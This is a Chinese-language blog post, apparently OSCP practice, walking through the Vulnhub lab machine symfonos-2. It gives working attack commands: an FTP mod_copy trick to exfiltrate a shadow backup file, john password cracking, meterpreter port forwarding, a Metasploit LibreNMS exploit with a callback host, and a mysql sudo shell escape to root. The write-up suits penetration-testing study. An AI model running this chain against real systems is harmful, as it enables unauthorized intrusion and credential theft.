<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>OSCP-Intermediate-symfonos_2 | Hustler&#39;s Blog</title>
  <meta name="author" content="Hustler">
  
  <meta name="description" content="Everybody needs love,but hacker dont">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="OSCP-Intermediate-symfonos_2"/>
  <meta property="og:site_name" content="Hustler&#39;s Blog"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="Hustler&#39;s Blog" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>





<meta name="generator" content="Hexo 7.1.1"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">Hustler&#39;s Blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/archives" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> OSCP-Intermediate-symfonos_2</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	
	<!-- content -->
	<div class="mypage">		
	  		

	  <h1 id="symfonos-2"><a href="#symfonos-2" class="headerlink" title="symfonos-2"></a>symfonos-2</h1><h2 id="来源：Vulnhub"><a href="#来源：Vulnhub" class="headerlink" title="来源：Vulnhub"></a>来源：Vulnhub</h2><h3 id="难度：Intermediate"><a href="#难度：Intermediate" class="headerlink" title="难度：Intermediate"></a>难度：Intermediate</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap <span class="token parameter variable">-O</span> <span class="token parameter variable">-A</span> <span class="token parameter variable">-Pn</span> <span class="token parameter variable">-sV</span> <span class="token parameter variable">-sS</span> -p- <span class="token number">192.168</span>.36.0/24 <span class="token parameter variable">-vv</span> <span class="token parameter variable">-exclude</span> <span class="token number">192.168</span>.36.1

<span class="token comment"># 对除了192.168.36.1之外的目标进行全端口SYN半开扫描，探测系统和服务</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>发现目标<code>192.168.36.135</code>开启了<code>80,445,22,21</code>等端口，对应web，smb，ssh，ftp等服务<br>访问80端口，发现有网页，尝试爆破目录无果<br>使用命令</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">smbclient <span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token number">192.168</span>.36.135<span class="token punctuation">\</span><span class="token punctuation">\</span>anonymous<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>尝试匿名登录smb服务（空密码）<br>成功登录后dir查看目录发现有一个backup文件夹，下面有个log.txt文件，从中我们们看到一些敏感信息：<br><img src="/images/OSCPsymfonos2/1.JPG"><br><img src="/images/OSCPsymfonos2/2.JPG"><br><img src="/images/OSCPsymfonos2/3.JPG"><br>发现<code>/var/backups/shadow.bak</code>这个文件里面存放着加密后的用户密码，并且存在一个用户aeolus，且匿名smb登录的目录是<code>/home/aeolus/share</code><br>继续使用enum4linux工具爆破出了另一个用户名，不过并没有多大作用<br>没有思路，使用searchsploit发现ftp服务似乎有文件copy漏洞，尝试复现（一开始尝试使用searchsploit的payload复制一句话到web目录，但因为web目录没有写权限而失败）<br>我们首先使用<code>ftp 192.168.36.135</code>命令连接ftp服务器，使用匿名账户，随意输入密码发现身份认证失败，但是仍然连接着<br>然后使用<code>site cpfr /var/backups/shadow.bak</code>选择来源文件<br>再使用<code>site cpto /home/aeolus/share/shadow.bak</code>选择目的文件，即将shadow.bak拷贝到我们能访问的smb目录下，下载后cat发现被加密后的各个用户的密码：<br><img src="/images/OSCPsymfonos2/4.JPG"><br>尝试直接拿密码hash去在线解密网站解密，失败，遂使用john爆破，命令如下：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">john <span class="token parameter variable">--wordlist</span><span class="token operator">=</span>/usr/share/wordlists/rockyou.txt shadow.bak

<span class="token comment"># 注意这里有个坑 每次使用john之前 要把运行目录下的.john/john.pot文件给删掉 否则john无法正确爆破</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/images/OSCPsymfonos2/5.JPG"><br>解得密码<code>sergioteamo</code>，马上尝试ssh登录得到shell，进入后尝试使用les.sh和linpeas.sh等提权脚本发现作用不大，尝试获取端口信息：<br>1.尝试使用脚本获取端口信息，无果<br>2.尝试直接netstat，无法运行<br>所以此时，我们还剩下一个选项，就是尝试得到一个metepreter session然后来查看端口开放状态<br>打开msfconsole，使用命令</p>
<pre class="line-numbers language-none"><code class="language-none">use auxiliary&#x2F;scanner&#x2F;ssh&#x2F;ssh_login  # 密码登录
use auxiliary&#x2F;scanner&#x2F;ssh&#x2F;ssh_login_pubkey  # 公私钥登录<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>来通过ssh创建一个session，随后使用</p>
<pre class="line-numbers language-none"><code class="language-none">use post&#x2F;multi&#x2F;manage&#x2F;shell_to_meterpreter  # 选择通过shell来创建meterpreter
set session 1  # 选择session1上的shell 如果是nc等 也可以通过配置options里的地址和端口来选择
run  # 启动
sessions 2  # 切换到meterpreter<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>来得到一个meterpreter，随后我们尝试netstat，看到nmap没扫出来的端口和开放服务：<br><img src="/images/OSCPsymfonos2/6.JPG"><br>其中我们发现，目标在8080端口上布置了一个只能本地访问的服务，并且看起来像web服务，这时，如果我们想访问这个服务，就只能通过端口转发，新建一条路由，将8080转发到我们这边的端口，然后访问我们这边的端口，具体命令如下：</p>
<pre class="line-numbers language-none"><code class="language-none">portfwd add -l 1111 -p 8080 -r 127.0.0.1

portfwd add -l 本地端口 -p 远程端口 -r 远程主机（可以是127.0.0.1 也可以是内网其他地址 但绝对不会是公网地址）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>随后我们访问本地的1111端口，发现了新的web服务：<br><img src="/images/OSCPsymfonos2/7.JPG"><br>尝试使用跟ssh相同的用户名和密码登录，成功登录，尝试在msfconsole中搜索相关组件的漏洞，使用addhost漏洞，并作如下配置：</p>
<pre class="line-numbers language-none"><code class="language-none">set lhost 192.168.36.132 # 设置回连地址 不能是127.0.0.1等 只能是内网地址或者0.0.0.0

set password sergioteamo
set username aeolus
# 设置用户名和密码

set rhost localhost # 因为服务被映射到本地 所以是localhost
set rport 1111 # 服务被映射到了本地1111端口
run # 启动<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到一个新的session，看似没有回连，实则输入命令就有回显：<br><img src="/images/OSCPsymfonos2/8.JPG"><br>使用命令<code>sudo -l</code>查看可以以sudo运行的指令，发现有mysql，使用经典mysql suid提权指令<code>sudo mysql -e &#39;\! /bin/sh&#39;</code>成功提权：<br><img src="/images/OSCPsymfonos2/9.JPG"></p>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a type="button" class="btn btn-default disabled"><i class="fa fa-arrow-circle-o-left"></i>Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/12/16/OSCP-symfonos1/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-12-19 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/靶场练习/">靶场练习<span>3</span></a></li> <li><a href="/categories/靶场练习/OSCP/">OSCP<span>3</span></a></li> <li><a href="/categories/靶场练习/OSCP/Vulnhub/">Vulnhub<span>3</span></a></li> <li><a href="/categories/靶场练习/OSCP/Vulnhub/Intermediate/">Intermediate<span>2</span></a></li>

<div class="widget tag">
  <h3 class="title">All Categories</h3>
     <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/SRC%E6%8C%96%E6%8E%98/">SRC挖掘</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%AA%E4%BA%BA%E9%A1%B9%E7%9B%AE/">个人项目</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/">竞赛</a><span class="category-list-count">21</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/AWD/">AWD</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/">CTF</a><span class="category-list-count">20</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/Classical-Crypto/">Classical Crypto</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/Misc/">Misc</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/PWN/">PWN</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/Reverse/">Reverse</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AB%9E%E8%B5%9B/CTF/Web/">Web</a><span class="category-list-count">9</span></li></ul></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%80%9F%E6%9F%A5/">速查</a><span class="category-list-count">4</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%80%9F%E6%9F%A5/CTF/">CTF</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%80%9F%E6%9F%A5/%E5%8D%9A%E5%AE%A2/">博客</a><span class="category-list-count">2</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/">靶场练习</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/OSCP/">OSCP</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/OSCP/Vulnhub/">Vulnhub</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/OSCP/Vulnhub/Easy/">Easy</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/OSCP/Vulnhub/Intermediate/">Intermediate</a><span class="category-list-count">2</span></li></ul></li></ul></li></ul></li></ul> 
</div>
 
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/OSCP/">OSCP<span>3</span></a></li> <li><a href="/tags/靶场练习/">靶场练习<span>3</span></a></li> <li><a href="/tags/Vulnhub/">Vulnhub<span>3</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 Hustler's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
